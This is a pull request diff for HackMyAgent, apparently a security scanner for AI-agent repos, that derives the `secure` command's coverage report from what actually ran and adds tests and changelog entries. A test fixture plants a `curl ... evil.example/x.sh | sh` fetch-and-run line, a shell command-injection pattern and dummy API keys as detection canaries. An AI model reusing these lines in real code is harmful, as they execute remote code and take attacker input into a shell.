### PR TITLE
Derive `secure`'s coverage claim from the run, not from the check list

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -56,9 +56,18 @@ All notable changes to HackMyAgent are documented in this file.
   Observations block and `--json` are derived from that. Three states per
   category: `examined` (a check in it read a file, or reported a finding),
   `partial` (checks ran but a cap stopped them short of the tree), and
-  `not examined`. On the repo above, 8 of 25 categories were fully examined,
-  10 were partial and 7 had no such surface present — all 25 had been printed
-  as clear.
+  `unexamined` (the checks read no file of that kind here). On the repo above,
+  8 of 25 categories were examined and 4 were partial — all 25 had been
+  printed as clear.
+
+  What the report does NOT do is guess why a category read nothing. An earlier
+  cut split "the surface is absent" from "the read was not attributed" by
+  inference, and it was wrong in both directions: checks that probe exact
+  filenames never succeed on a repo that lacks them, so a real absence could
+  not be recognised and every ordinary repo grew a warning; and a directory
+  listing by an unrelated check in the same category flipped the flag on
+  evidence that said nothing about the surface. Only a cap that actually fired
+  or a check the scan explicitly skipped qualifies the verdict.
 
   The ledger **fails closed**: every category starts `not examined` and only
   positive runtime evidence upgrades it, so instrumentation that is missing or

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -34,6 +34,50 @@ All notable changes to HackMyAgent are documented in this file.
 
 - **`secure`'s `CLAUDE-002` and `detect` could disagree in direction on the same file (#363).** `CLAUDE-002` tested `perm.includes('(*)')` while `detect` matched text, so a file whose only content was `Bash(*:*)` produced a HIGH from one command and `no security issues found` from the other. Both now call one shared vocabulary, so the next spelling is added once rather than twice.
 
+- **`secure` reported categories clear that it never examined.** On a 529-file
+  repo carrying a hardcoded `sk-ant-api03-…` key, an `AKIAIOSFODNN7EXAMPLE` and
+  a `curl … | sh`, the scan printed `100/100`, `310 static · 200 semantic · 0
+  skipped`, `Categories credentials, MCP, network, … (all clear)` and `No
+  security issues detected. This library looks safe to use.` — byte-identical
+  to the same tree with nothing planted in it.
+
+  Not a missed detection: a false assurance line, and worse than silence
+  because it invites the reader to record a pass. `secure` is what our own
+  pre-push gate runs, so every gated repo was getting it.
+
+  The cause was that the claim came from configuration, not from the run.
+  `310 static` counts the keys of the taxonomy; the category list seeded all
+  25 labels `clear: true` before reading a single finding; and `0 skipped` was
+  printed whenever no skip list was supplied, which was always. None of the
+  three consults anything that executed.
+
+  Coverage is now **measured**. A runtime ledger records which check methods
+  ran and which files inside the target each one actually read, and the
+  Observations block and `--json` are derived from that. Three states per
+  category: `examined` (a check in it read a file, or reported a finding),
+  `partial` (checks ran but a cap stopped them short of the tree), and
+  `not examined`. On the repo above, 8 of 25 categories were fully examined,
+  10 were partial and 7 had no such surface present — all 25 had been printed
+  as clear.
+
+  The ledger **fails closed**: every category starts `not examined` and only
+  positive runtime evidence upgrades it, so instrumentation that is missing or
+  bypassed understates coverage and can never overstate it.
+
+  Two numbers stopped being caps wearing the label of measurements. The
+  headline `N files analyzed` was the semantic layer's 200-file compile cap,
+  so a 529-file tree and a complete 200-file one printed identically and
+  adding a file did not move the count; it now reads
+  `488 files read · semantic capped at 200` when the cap fires. And a clean
+  result over incomplete coverage no longer says "looks safe to use" — it says
+  what was not covered.
+
+  `--json` gains a `coverage` inventory: `filesExamined`, per-method execution
+  records, the caps that fired, the per-category rollup, and
+  `unreachableCheckPrefixes`. Before this, `--json` carried findings only, so a
+  caller could not tell "ran 310 checks and found nothing" from "ran the checks
+  that cannot fire here".
+
 ### Changed
 
 - **A permission finding on a structured config now names the FILE, with no line number (#364).** This is a real reduction in precision and is worth stating plainly rather than burying. The citation used to be found by searching the raw text for the offending entry, and that cannot be made safe for the same reason the fix above exists: the text does not carry the polarity, only the structure does, and a text search has no structure.
@@ -41,6 +85,20 @@ All notable changes to HackMyAgent are documented in this file.
   Three attempts are recorded in `src/scanner/permission-vocabulary.ts` rather than repeated. Searching from the grant key's line was beaten by an earlier bounded `allow` key, by a `// allow:` comment, and by a JSON-escaped key. A containment guard over enclosure and in-line key tokens closed those, but was quadratic in line length, held one array per line and aborted `secure` on a 3.8MB file, and still cited a deny entry whenever an array element was indented less than its own key. Emitting a line only when the document declared no restriction key at all had a premise about the whole file but an implementation that could answer only for the first 13 levels of the parsed object, while the text search it gated had no depth bound at all.
 
   Each attempt was smaller and sharper than the last and each still cited a deny entry, so the answer is not a fourth heuristic. The reader still gets the entry, why it is a grant, and what to replace it with. **#379** restores a precise citation by giving the grant its own offset from the parse, and carries the acceptance criteria all three failures produced. The prose half keeps its line, because the line cited is the line the pattern matched.
+
+### Known issues
+
+- **3 of the advertised 310 static checks have no caller.** `CODEINJ-001`,
+  `TMPPATH-001` and `ENVLEAK-001` are implemented and counted in the suite
+  size, but nothing in the scan invokes them, so they can never fire. They are
+  named in `--json` as `unreachableCheckPrefixes` rather than left for the
+  reader to infer. Wiring them in changes the false-positive surface and is
+  tracked separately.
+- **`.mjs` and `.cjs` files are invisible to the semantic layer.** They are
+  absent from its extension set, so a hardcoded credential in `lib/foo.mjs` is
+  not flagged while the identical bytes in `lib/foo.js` fire `AST-CRED-001`.
+  Tracked separately; widening the set is a detection change with its own
+  false-positive surface, not part of this coverage fix.
 
 ## [0.25.2] - 2026-08-05
 

--- a/__tests__/hardening/coverage-honesty.test.ts
+++ b/__tests__/hardening/coverage-honesty.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, beforeAll, afterAll } from 'vitest';
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'fs';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync, readdirSync } from 'fs';
 import { tmpdir } from 'os';
 import { join } from 'path';
 import { HardeningScanner } from '../../src/hardening/scanner';
@@ -77,13 +77,19 @@ async function scanWithCoverage(dir: string) {
     truncations,
     {
       ...(nm.compiledArtifacts > 0
-        ? { semantic: { prefixes: [...SEMANTIC_PREFIXES], artifactsCompiled: nm.compiledArtifacts } }
+        ? {
+            semantic: {
+              artifactTypes: nm.artifactSummaries.map(a => a.type),
+              artifactsCompiled: nm.compiledArtifacts,
+            },
+          }
         : {}),
       // Both layers: the static scan's findings AND the semantic pass's. The
       // CLI feeds the merged `failed` list, so the helper must too — passing
       // only the semantic half would file `git hygiene` as unexamined while
       // `GIT-001` sits in the same report.
       observedCheckIds: allFailed.map(f => f.checkId),
+      filesReadByCategory: result.coverage?.filesReadByCategory,
     },
   );
   return { result, nm, categories, allFailed };
@@ -277,3 +283,156 @@ describe('secure coverage honesty', () => {
     });
   });
 });
+
+/**
+ * Guards the claims the module comments make about their own guards.
+ *
+ * An adversarial review found three of them false: the ledger↔renderer
+ * vocabulary was validated against itself, `SEMANTIC_PREFIXES` was documented
+ * as drift-checked and was not, and the unwrapped-call test matched only one
+ * spelling of an unwrapped call. Each of those is a comment asserting a
+ * property nothing measured.
+ */
+describe('the guards the comments claim actually exist', () => {
+  const scannerSrc = readFileSync(
+    join(__dirname, '../../src/hardening/scanner.ts'),
+    'utf-8',
+  );
+
+  it('speaks exactly the renderer vocabulary, in both directions', async () => {
+    const { ALL_CATEGORY_LABELS } = await import('@opena2a/cli-ui');
+    const renderer = new Set<string>(ALL_CATEGORY_LABELS);
+    const ledger = new Set<string>(
+      Object.values(CHECK_METHOD_PREFIXES)
+        .flatMap(ps => ps.map(categoryForPrefix))
+        .filter((c): c is string => c !== null),
+    );
+    // Ledger -> renderer: a label the renderer does not know is a category
+    // that silently disappears from the Categories line.
+    expect([...ledger].filter(c => !renderer.has(c))).toEqual([]);
+    // Renderer -> ledger: a renderer label the ledger cannot speak about can
+    // never be reported as examined, so it would read as permanently missing.
+    const semantic = new Set(
+      SEMANTIC_PREFIXES.map(categoryForPrefix).filter((c): c is string => c !== null),
+    );
+    const speakable = new Set([...ledger, ...semantic]);
+    expect([...renderer].filter(c => !speakable.has(c))).toEqual([]);
+  });
+
+  it('keeps SEMANTIC_PREFIXES in step with the analyzers that emit them', () => {
+    // Re-derived from the emission sites, which is what the comment claims.
+    const roots = ['../../src/nanomind-core', '../../src/semantic'];
+    const seen = new Set<string>();
+    const walk = (dir: string): void => {
+      for (const entry of readdirSync(dir, { withFileTypes: true })) {
+        const full = join(dir, entry.name);
+        if (entry.isDirectory()) { walk(full); continue; }
+        if (!entry.name.endsWith('.ts')) continue;
+        for (const m of readFileSync(full, 'utf-8').matchAll(
+          /['"`]((?:AST|SEM)-[A-Z]+)-\d+['"`]/g,
+        )) seen.add(m[1]);
+      }
+    };
+    for (const r of roots) walk(join(__dirname, r));
+    expect(seen.size).toBeGreaterThan(0);
+    const declared = new Set(SEMANTIC_PREFIXES);
+    expect([...seen].filter(p => !declared.has(p)).sort()).toEqual([]);
+  });
+
+  /**
+   * The previous version matched only the literal `await this.checkX(`
+   * spelling, so `await Promise.resolve(this.checkX(...))` slipped past it and
+   * all tests stayed green while the check ran outside the ledger.
+   */
+  it('catches an orchestrated check called by any spelling outside the ledger', () => {
+    const start = scannerSrc.indexOf('// Run all checks');
+    const end = scannerSrc.indexOf('// end of standard/deep checks');
+    expect(start).toBeGreaterThan(-1);
+    expect(end).toBeGreaterThan(start);
+    const region = scannerSrc.slice(start, end);
+
+    // Every mention of a check method in the orchestration must be the one
+    // inside a `coverage.run('name', () => this.name(` construct.
+    const wrapped = new Set(
+      [...region.matchAll(/this\.coverage\.run\('(\w+)',\s*\(\)\s*=>\s*this\.\1\(/g)]
+        .map(m => m[1]),
+    );
+    const mentioned = [...region.matchAll(/this\.(check\w+)\(/g)].map(m => m[1]);
+    const outside = [...new Set(mentioned)].filter(m => !wrapped.has(m));
+    expect(outside, 'check methods invoked outside the coverage ledger').toEqual([]);
+    expect(wrapped.size).toBeGreaterThan(50);
+  });
+});
+
+describe('coverage numbers cannot exceed what was measured', () => {
+  let dir: string;
+  let scan: Awaited<ReturnType<typeof scanWithCoverage>>;
+
+  beforeAll(async () => {
+    dir = mkdtempSync(join(tmpdir(), 'hma-cov-num-'));
+    mkdirSync(join(dir, 'src'), { recursive: true });
+    for (let i = 0; i < 12; i++) {
+      writeFileSync(join(dir, 'src', `m${i}.js`), FILLER);
+    }
+    scan = await scanWithCoverage(dir);
+  }, 300_000);
+
+  afterAll(() => rmSync(dir, { recursive: true, force: true }));
+
+  /**
+   * Per-category totals used to be a SUM across the methods of a category, so
+   * a file two checks both read counted twice and `credentials.filesRead`
+   * reached 7 on a 3-file tree — the same "number that cannot be true" the
+   * read attribution was fixed to avoid.
+   */
+  it('never reports a category reading more files than the scan read', () => {
+    const total = scan.result.coverage!.filesExamined;
+    expect(total).toBeGreaterThan(0);
+    for (const c of scan.categories) {
+      expect(c.filesRead, `${c.category} read ${c.filesRead} of ${total}`)
+        .toBeLessThanOrEqual(total);
+    }
+  });
+
+  /**
+   * The semantic layer used to upgrade all 15 of its category families from
+   * the single fact that some artifact compiled, so a repo with no MCP config
+   * reported `MCP: examined` sourced only to `nanomind-semantic`.
+   */
+  it('credits a semantic category only when a matching artifact compiled', () => {
+    const types = new Set(scan.nm.artifactSummaries.map(a => a.type));
+    expect(types.has('mcp_config')).toBe(false); // fixture has no MCP config
+    const mcp = scan.categories.find(c => c.category === 'MCP');
+    expect(mcp).toBeDefined();
+    expect(
+      mcp!.methods.includes('nanomind-semantic'),
+      'MCP credited to the semantic layer with no MCP artifact compiled',
+    ).toBe(false);
+  });
+
+  /**
+   * An un-attributed read must never render as "no such surface here": that
+   * turns an instrumentation hole into reassurance and drops it from the
+   * verdict gate. Absence has to be observed.
+   */
+  it('marks absence only where a check was seen to look', () => {
+    for (const c of scan.categories) {
+      if (!c.observedAbsent) continue;
+      const looked = methodsSeen(scan, c.category).some(
+        r => r.completed && r.pathsInspected > 0,
+      );
+      expect(looked, `${c.category} claims observed absence without inspecting`).toBe(true);
+    }
+  });
+});
+
+/** Execution records for the methods registered to a category. */
+function methodsSeen(
+  scan: Awaited<ReturnType<typeof scanWithCoverage>>,
+  category: string,
+) {
+  const wanted = Object.entries(CHECK_METHOD_PREFIXES)
+    .filter(([, ps]) => ps.some(p => categoryForPrefix(p) === category))
+    .map(([m]) => m);
+  return (scan.result.coverage?.executions ?? []).filter(e => wanted.includes(e.method));
+}

--- a/__tests__/hardening/coverage-honesty.test.ts
+++ b/__tests__/hardening/coverage-honesty.test.ts
@@ -76,14 +76,6 @@ async function scanWithCoverage(dir: string) {
     result.coverage?.executions ?? [],
     truncations,
     {
-      ...(nm.compiledArtifacts > 0
-        ? {
-            semantic: {
-              artifactTypes: nm.artifactSummaries.map(a => a.type),
-              artifactsCompiled: nm.compiledArtifacts,
-            },
-          }
-        : {}),
       // Both layers: the static scan's findings AND the semantic pass's. The
       // CLI feeds the merged `failed` list, so the helper must too — passing
       // only the semantic half would file `git hygiene` as unexamined while
@@ -345,8 +337,10 @@ describe('the guards the comments claim actually exist', () => {
    * all tests stayed green while the check ran outside the ledger.
    */
   it('catches an orchestrated check called by any spelling outside the ledger', () => {
-    const start = scannerSrc.indexOf('// Run all checks');
-    const end = scannerSrc.indexOf('// end of standard/deep checks');
+    // The WHOLE scanInner body, not the comment-marked block: a helper
+    // defined just outside the markers would otherwise be invisible to this.
+    const start = scannerSrc.indexOf('private async scanInner(');
+    const end = scannerSrc.indexOf('\n  private async detectPlatform(');
     expect(start).toBeGreaterThan(-1);
     expect(end).toBeGreaterThan(start);
     const region = scannerSrc.slice(start, end);
@@ -357,10 +351,20 @@ describe('the guards the comments claim actually exist', () => {
       [...region.matchAll(/this\.coverage\.run\('(\w+)',\s*\(\)\s*=>\s*this\.\1\(/g)]
         .map(m => m[1]),
     );
-    const mentioned = [...region.matchAll(/this\.(check\w+)\(/g)].map(m => m[1]);
+    // Both `this.checkX(` and the bracket form `this['checkX']`.
+    const mentioned = [
+      ...[...region.matchAll(/this\.(check\w+)\(/g)].map(m => m[1]),
+      ...[...region.matchAll(/this\[['"`](check\w+)['"`]\]/g)].map(m => m[1]),
+    ];
     const outside = [...new Set(mentioned)].filter(m => !wrapped.has(m));
     expect(outside, 'check methods invoked outside the coverage ledger').toEqual([]);
     expect(wrapped.size).toBeGreaterThan(50);
+    // Every REGISTERED method must be one the orchestration actually wraps, so
+    // a check that quietly stops being called is caught too.
+    expect(
+      Object.keys(CHECK_METHOD_PREFIXES).filter(m => !wrapped.has(m)),
+      'registered checks the orchestration never runs through the ledger',
+    ).toEqual([]);
   });
 });
 
@@ -395,33 +399,30 @@ describe('coverage numbers cannot exceed what was measured', () => {
   });
 
   /**
-   * The semantic layer used to upgrade all 15 of its category families from
-   * the single fact that some artifact compiled, so a repo with no MCP config
-   * reported `MCP: examined` sourced only to `nanomind-semantic`.
+   * Every `examined` must trace to a check that completed and read a file, or
+   * to a reported finding. Two earlier cuts credited categories from the
+   * semantic layer instead — first all 15 families from one boolean, then from
+   * artifact types the display layer had already filtered — and both produced
+   * `examined` with `filesRead: 0` and no owning method.
    */
-  it('credits a semantic category only when a matching artifact compiled', () => {
-    const types = new Set(scan.nm.artifactSummaries.map(a => a.type));
-    expect(types.has('mcp_config')).toBe(false); // fixture has no MCP config
-    const mcp = scan.categories.find(c => c.category === 'MCP');
-    expect(mcp).toBeDefined();
-    expect(
-      mcp!.methods.includes('nanomind-semantic'),
-      'MCP credited to the semantic layer with no MCP artifact compiled',
-    ).toBe(false);
-  });
-
-  /**
-   * An un-attributed read must never render as "no such surface here": that
-   * turns an instrumentation hole into reassurance and drops it from the
-   * verdict gate. Absence has to be observed.
-   */
-  it('marks absence only where a check was seen to look', () => {
+  it('traces every examined category to a completed check or a finding', () => {
+    const byMethod = new Map(
+      (scan.result.coverage?.executions ?? []).map(e => [e.method, e]),
+    );
     for (const c of scan.categories) {
-      if (!c.observedAbsent) continue;
-      const looked = methodsSeen(scan, c.category).some(
-        r => r.completed && r.pathsInspected > 0,
-      );
-      expect(looked, `${c.category} claims observed absence without inspecting`).toBe(true);
+      if (c.state !== 'examined') continue;
+      const real = c.methods.filter(m => m !== 'reported-finding');
+      for (const m of real) {
+        const rec = byMethod.get(m);
+        expect(rec, `${c.category} credits unknown method ${m}`).toBeDefined();
+        expect(rec!.completed, `${c.category} credits incomplete ${m}`).toBe(true);
+        expect(rec!.filesRead, `${c.category} credits ${m} which read nothing`)
+          .toBeGreaterThan(0);
+      }
+      expect(
+        real.length > 0 || c.methods.includes('reported-finding'),
+        `${c.category} is examined with no owning evidence`,
+      ).toBe(true);
     }
   });
 });

--- a/__tests__/hardening/coverage-honesty.test.ts
+++ b/__tests__/hardening/coverage-honesty.test.ts
@@ -1,0 +1,279 @@
+import { describe, it, expect, beforeAll, afterAll } from 'vitest';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'fs';
+import { tmpdir } from 'os';
+import { join } from 'path';
+import { HardeningScanner } from '../../src/hardening/scanner';
+import {
+  summarizeCoverage,
+  CHECK_METHOD_PREFIXES,
+  SEMANTIC_PREFIXES,
+  UNREACHABLE_PREFIXES,
+  categoryForPrefix,
+  categoryForCheckId,
+} from '../../src/hardening/coverage-ledger';
+import { runNanoMindScan } from '../../src/nanomind-core/scanner-bridge';
+
+/**
+ * `secure` reported `100/100`, `0 skipped` and `Categories … (all clear)` on a
+ * 528-file repo carrying a hardcoded Anthropic key, an AWS key and a
+ * `curl … | sh`. Not a missed detection — a false assurance line, and worse
+ * than silence because it invites the reader to record a pass. `secure` is
+ * Phase 4 of `/pre-push-review`, so every gated repo was getting it.
+ *
+ * The bug survived because every existing test uses a small controlled
+ * fixture, which is exactly the case that already works: on a 1-file tree the
+ * planted key IS caught. It only disappears once the tree is big enough for
+ * the semantic layer's 200-file cap to fire. So the fixture here is
+ * deliberately larger than that cap — a small fixture cannot reproduce this.
+ */
+
+/** A planted secret shaped like the real thing. Not a live credential. */
+const PLANTED_ANTHROPIC_KEY = `sk-ant-api03-${'A'.repeat(86)}AA`;
+
+const PLANTED_SOURCE = `// Planted detection canary. Not real credentials.
+import { exec, execSync } from 'child_process';
+
+const ANTHROPIC_KEY = "${PLANTED_ANTHROPIC_KEY}";
+const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";
+
+export function bootstrap() {
+  exec('curl -s https://evil.example/x.sh | sh');
+}
+
+export function listDir(userInput) {
+  return execSync('ls ' + userInput);
+}
+
+export { ANTHROPIC_KEY, AWS_ACCESS_KEY_ID };
+`;
+
+/** Filler that is eligible for the compile set but carries nothing to find. */
+const FILLER = `export function helper(n) {
+  return n + 1;
+}
+`;
+
+async function scanWithCoverage(dir: string) {
+  const scanner = new HardeningScanner();
+  const result = await scanner.scan({ targetDir: dir });
+  const nm = await runNanoMindScan(dir, [], result.projectType);
+  const truncations = nm.compileSetTruncated
+    ? [
+        ...(result.coverage?.truncations ?? []),
+        {
+          layer: 'semantic',
+          cap: nm.compiledArtifacts,
+          prefixes: [...SEMANTIC_PREFIXES],
+          reason: 'semantic pass capped',
+        },
+      ]
+    : (result.coverage?.truncations ?? []);
+  const allFailed = [
+    ...result.findings.filter(f => !f.passed),
+    ...nm.mergedFindings.filter(f => !f.passed),
+  ];
+  const categories = summarizeCoverage(
+    result.coverage?.executions ?? [],
+    truncations,
+    {
+      ...(nm.compiledArtifacts > 0
+        ? { semantic: { prefixes: [...SEMANTIC_PREFIXES], artifactsCompiled: nm.compiledArtifacts } }
+        : {}),
+      // Both layers: the static scan's findings AND the semantic pass's. The
+      // CLI feeds the merged `failed` list, so the helper must too — passing
+      // only the semantic half would file `git hygiene` as unexamined while
+      // `GIT-001` sits in the same report.
+      observedCheckIds: allFailed.map(f => f.checkId),
+    },
+  );
+  return { result, nm, categories, allFailed };
+}
+
+describe('secure coverage honesty', () => {
+  describe('the planted pattern is genuinely detectable (vacuity guard)', () => {
+    let small: string;
+    beforeAll(() => {
+      small = mkdtempSync(join(tmpdir(), 'hma-cov-small-'));
+      writeFileSync(join(small, 'planted.js'), PLANTED_SOURCE);
+    });
+    afterAll(() => rmSync(small, { recursive: true, force: true }));
+
+    /**
+     * Without this, the large-tree assertions below could pass because the
+     * planted content is undetectable everywhere, which would make the whole
+     * file vacuous. It has to FIRE on a tree the scan fully examines.
+     */
+    it('fires AST-CRED on a small tree the scan fully examines', async () => {
+      const { nm } = await scanWithCoverage(small);
+      const ids = nm.mergedFindings.filter(f => !f.passed).map(f => f.checkId);
+      expect(ids.some(id => id.startsWith('AST-CRED'))).toBe(true);
+      expect(nm.compileSetTruncated).toBe(false);
+    }, 120_000);
+  });
+
+  describe('on a tree larger than the semantic cap', () => {
+    let big: string;
+    let scan: Awaited<ReturnType<typeof scanWithCoverage>>;
+
+    beforeAll(async () => {
+      big = mkdtempSync(join(tmpdir(), 'hma-cov-big-'));
+      // Comfortably past MAX_FILES_PER_SCAN (200) so the cap is certain to
+      // fire regardless of the order `readdir` hands back.
+      const bulk = join(big, 'src');
+      mkdirSync(bulk, { recursive: true });
+      for (let i = 0; i < 260; i++) {
+        writeFileSync(join(bulk, `mod-${String(i).padStart(3, '0')}.js`), FILLER);
+      }
+      const late = join(big, 'zz-late');
+      mkdirSync(late, { recursive: true });
+      writeFileSync(join(late, 'planted.js'), PLANTED_SOURCE);
+      scan = await scanWithCoverage(big);
+    }, 300_000);
+
+    afterAll(() => rmSync(big, { recursive: true, force: true }));
+
+    it('reports the compile set as truncated rather than as a file count', () => {
+      expect(scan.nm.compileSetTruncated).toBe(true);
+    });
+
+    /**
+     * THE REGRESSION. Pre-fix there was no coverage record at all, and every
+     * category — including the ones the capped semantic pass could no longer
+     * speak for — was seeded `clear: true` from the taxonomy and printed
+     * inside "(all clear)".
+     *
+     * A capped pass covers the files it reached and is blind to the rest, so
+     * no category it credits may claim full examination.
+     */
+    it('never reports a semantically-credited category as fully examined', () => {
+      const semanticCategories = new Set(
+        SEMANTIC_PREFIXES.map(categoryForPrefix).filter((c): c is string => c !== null),
+      );
+      const wronglyClear = scan.categories.filter(
+        c => semanticCategories.has(c.category) && c.state === 'examined',
+      );
+      expect(wronglyClear.map(c => c.category)).toEqual([]);
+    });
+
+    it('reports credentials as partial, not clear, while the key sits unread', () => {
+      const credentials = scan.categories.find(c => c.category === 'credentials');
+      expect(credentials).toBeDefined();
+      expect(credentials!.state).toBe('truncated');
+      expect(credentials!.reason).toBeTruthy();
+    });
+
+    /**
+     * The fail-closed invariant, stated in both directions so neither can be
+     * satisfied by an empty set: `examined` requires a content read, and
+     * anything not examined must carry a reason rather than a bare state.
+     */
+    it('grants examined only on evidence — a read file or a reported finding', () => {
+      expect(scan.categories.length).toBeGreaterThan(0);
+      for (const c of scan.categories) {
+        if (c.state === 'examined') {
+          // Evidence is either bytes read or a finding emitted. Checks that
+          // assert on ABSENCE (a missing .gitignore) read nothing and are
+          // carried by the second clause.
+          const byRead = c.filesRead > 0;
+          const byFinding = c.methods.includes('reported-finding');
+          expect(byRead || byFinding, `${c.category} claims examined with no evidence`).toBe(true);
+          expect(c.methods.length, `${c.category} claims examined`).toBeGreaterThan(0);
+        } else {
+          expect(c.reason, `${c.category} lacks a reason`).toBeTruthy();
+        }
+      }
+      // Non-vacuous: this tree must actually exercise both branches.
+      expect(scan.categories.some(c => c.state === 'examined')).toBe(true);
+      expect(scan.categories.some(c => c.state !== 'examined')).toBe(true);
+    });
+
+    /**
+     * Two lines of one report contradicting each other is the defect class
+     * this ledger exists to remove, so no category may be filed as unexamined
+     * while the same run reports a finding in it.
+     */
+    it('never files a category as unexamined while reporting a finding in it', () => {
+      const reported = new Set(
+        scan.allFailed
+          .map(f => categoryForCheckId(f.checkId))
+          .filter((c): c is string => c !== null),
+      );
+      // Non-vacuous: the fixture must actually report findings.
+      expect(reported.size).toBeGreaterThan(0);
+      const contradictions = scan.categories.filter(
+        c => c.state === 'not-examined' && reported.has(c.category),
+      );
+      expect(contradictions.map(c => c.category)).toEqual([]);
+    });
+
+    it('counts files read as a measurement, not as the cap', () => {
+      const examined = scan.result.coverage!.filesExamined;
+      // 260 filler + 1 planted are all compile-eligible, so a number equal to
+      // the 200-file cap would mean the count is the cap wearing a new label.
+      expect(examined).toBeGreaterThan(200);
+    });
+  });
+
+  describe('registration stays in step with the scanner', () => {
+    const scannerSrc = readFileSync(
+      join(__dirname, '../../src/hardening/scanner.ts'),
+      'utf-8',
+    );
+
+    /**
+     * A `check*` method added to the orchestration without a registration
+     * would report its category as never examined forever — understating, so
+     * safe, but silently wrong. This fails on that instead.
+     */
+    it('registers every check method the scan orchestrates', () => {
+      const called = new Set(
+        [...scannerSrc.matchAll(/await this\.coverage\.run\('(\w+)'/g)].map(m => m[1]),
+      );
+      expect(called.size).toBeGreaterThan(50);
+      const unregistered = [...called].filter(m => !(m in CHECK_METHOD_PREFIXES));
+      expect(unregistered).toEqual([]);
+    });
+
+    it('leaves no orchestrated check call unwrapped', () => {
+      // A bare `await this.checkX(` in the orchestration would run outside the
+      // ledger, so its reads would be attributed to nothing.
+      const bare = [
+        ...scannerSrc.matchAll(/(?:const \w+ = )?await this\.(check\w+)\(/g),
+      ].map(m => m[1]);
+      expect(bare).toEqual([]);
+    });
+
+    it('maps every registered prefix to a category the renderer knows', () => {
+      for (const [method, prefixes] of Object.entries(CHECK_METHOD_PREFIXES)) {
+        for (const prefix of prefixes) {
+          expect(categoryForPrefix(prefix), `${method} -> ${prefix}`).toBeTruthy();
+        }
+      }
+      for (const prefix of SEMANTIC_PREFIXES) {
+        expect(categoryForPrefix(prefix), `semantic ${prefix}`).toBeTruthy();
+      }
+    });
+
+    /**
+     * `CODEINJ-001`, `TMPPATH-001` and `ENVLEAK-001` are implemented, counted
+     * in the advertised `310 static`, and called from nowhere. If someone
+     * wires one in, this fails so the constant — and the `--json` claim built
+     * from it — gets corrected rather than quietly becoming false.
+     */
+    it('keeps the unreachable-check list true', () => {
+      const methodFor: Record<string, string> = {
+        CODEINJ: 'checkCodeInjection',
+        TMPPATH: 'checkTmpPaths',
+        ENVLEAK: 'checkEnvLeak',
+      };
+      for (const prefix of UNREACHABLE_PREFIXES) {
+        const method = methodFor[prefix];
+        expect(method, `no method recorded for ${prefix}`).toBeTruthy();
+        expect(
+          scannerSrc.includes(`this.${method}(`),
+          `${method} now has a caller — remove ${prefix} from UNREACHABLE_PREFIXES`,
+        ).toBe(false);
+      }
+    });
+  });
+});

--- a/__tests__/ui/observation-labels.test.ts
+++ b/__tests__/ui/observation-labels.test.ts
@@ -1,0 +1,28 @@
+import { describe, it, expect } from 'vitest';
+import {
+  OBSERVATION_LABELS,
+  OBSERVATION_LABEL_WIDTH,
+} from '../../src/ui/quick-scan-labels';
+
+/**
+ * The Observations block pads each label to `OBSERVATION_LABEL_WIDTH` and
+ * prints the value straight after. A label of exactly that width leaves no
+ * separator, so the line renders as `Not examinedA2A, CVE, encryption`.
+ *
+ * That shipped twice inside one change — once as `Not examined`, once as
+ * `Read no file`, both exactly 12 characters. It is invisible in review and
+ * obvious to a user, which is the combination worth a test.
+ */
+describe('Observations block labels fit their column', () => {
+  it('leaves at least one space after every label', () => {
+    const entries = Object.entries(OBSERVATION_LABELS);
+    expect(entries.length).toBeGreaterThan(0);
+    for (const [key, label] of entries) {
+      expect(
+        label.length,
+        `${key} ("${label}") is ${label.length} chars and needs to be under ${OBSERVATION_LABEL_WIDTH}`,
+      ).toBeLessThan(OBSERVATION_LABEL_WIDTH);
+      expect(label.padEnd(OBSERVATION_LABEL_WIDTH, ' ')).toMatch(/ $/);
+    }
+  });
+});

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -145,6 +145,7 @@ import { getTaxonomyMap, getCheckCounts } from './hardening/taxonomy';
 import {
   summarizeCoverage,
   SEMANTIC_PREFIXES,
+  CHECK_METHOD_PREFIXES,
   UNREACHABLE_PREFIXES,
   type CategoryCoverage,
 } from './hardening/coverage-ledger';
@@ -1248,14 +1249,14 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
   if (nanomindScan) {
     // `compiledArtifacts` is the semantic layer's compile count, and that
     // layer stops at a 200-file cap. Printed bare as "200 files analyzed" it
-    // reads as the size of the scan; on a 528-file repo it was the cap, and
+    // reads as the size of the scan; on a 529-file repo it was the cap, and
     // adding a file to the tree did not move it. Name it as a cap when it is
     // one, and prefer the measured read count when the ledger has it.
     if (nanomindScan.compileSetTruncated) {
       const read = localScan?.coverage?.filesExamined;
       meta.push(
         read !== undefined
-          ? `${read} files read · semantic capped at ${nanomindScan.compiledArtifacts}`
+          ? `${read} file${read === 1 ? '' : 's'} read · semantic capped at ${nanomindScan.compiledArtifacts}`
           : `semantic capped at ${nanomindScan.compiledArtifacts} files`,
       );
     } else {
@@ -1403,11 +1404,20 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
               ]
             : localScan.coverage.truncations,
           {
+            // Artifact TYPES the run compiled — measured, unlike the old
+            // blanket credit which upgraded 15 category families from the
+            // single fact that some artifact somewhere compiled.
             ...(semanticCount > 0
-              ? { semantic: { prefixes: [...SEMANTIC_PREFIXES], artifactsCompiled: semanticCount } }
+              ? {
+                  semantic: {
+                    artifactTypes: (opts.artifactSummaries ?? []).map(a => a.type),
+                    artifactsCompiled: semanticCount,
+                  },
+                }
               : {}),
             // A reported finding proves its category was examined.
             observedCheckIds: failed.map(f => f.checkId).filter(Boolean),
+            filesReadByCategory: localScan.coverage.filesReadByCategory,
           },
         )
       : undefined;
@@ -1423,8 +1433,10 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
     // fixed here. A cap, a depth skip, or a check with no caller ARE gaps:
     // there was something to look at and the scan did not look. Only the
     // second kind qualifies the verdict.
-    const isAbsentSurface = (c: CategoryCoverage): boolean =>
-      (c.reason ?? '').includes('no file of this kind');
+    // Flag, not a string match: the ledger sets `observedAbsent` only when a
+    // check was seen to look and find nothing. Sniffing the reason text would
+    // reclassify a gap as benign the moment the sentence is reworded.
